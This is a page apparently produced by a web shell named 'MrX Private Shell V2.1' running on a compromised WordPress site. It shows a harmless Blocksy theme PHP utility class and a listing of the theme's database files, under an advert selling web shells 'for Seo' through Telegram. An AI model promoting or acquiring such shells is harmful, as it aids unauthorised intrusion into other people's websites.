__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Blocksy\Database;
class Utils {
static public function wp_get_table_names() {
global $wpdb;
$tables_sql = 'SHOW TABLES';
// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- Query is safe, see above.
$tables = $wpdb->get_col($tables_sql, 0);
return $tables;
}
static public function wp_get_relevant_table_names() {
global $wpdb;
return [
$wpdb->base_prefix . 'options',
$wpdb->base_prefix . 'posts',
$wpdb->base_prefix . 'postmeta',
];
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| cache-manager.php | File | 3.96 KB | 0640 |
|
| db-default-values-cleaner.php | File | 6.47 KB | 0640 |
|
| db-search-replace.php | File | 8.7 KB | 0640 |
|
| db-search-replacer.php | File | 5.44 KB | 0640 |
|
| db-utils.php | File | 496 B | 0640 |
|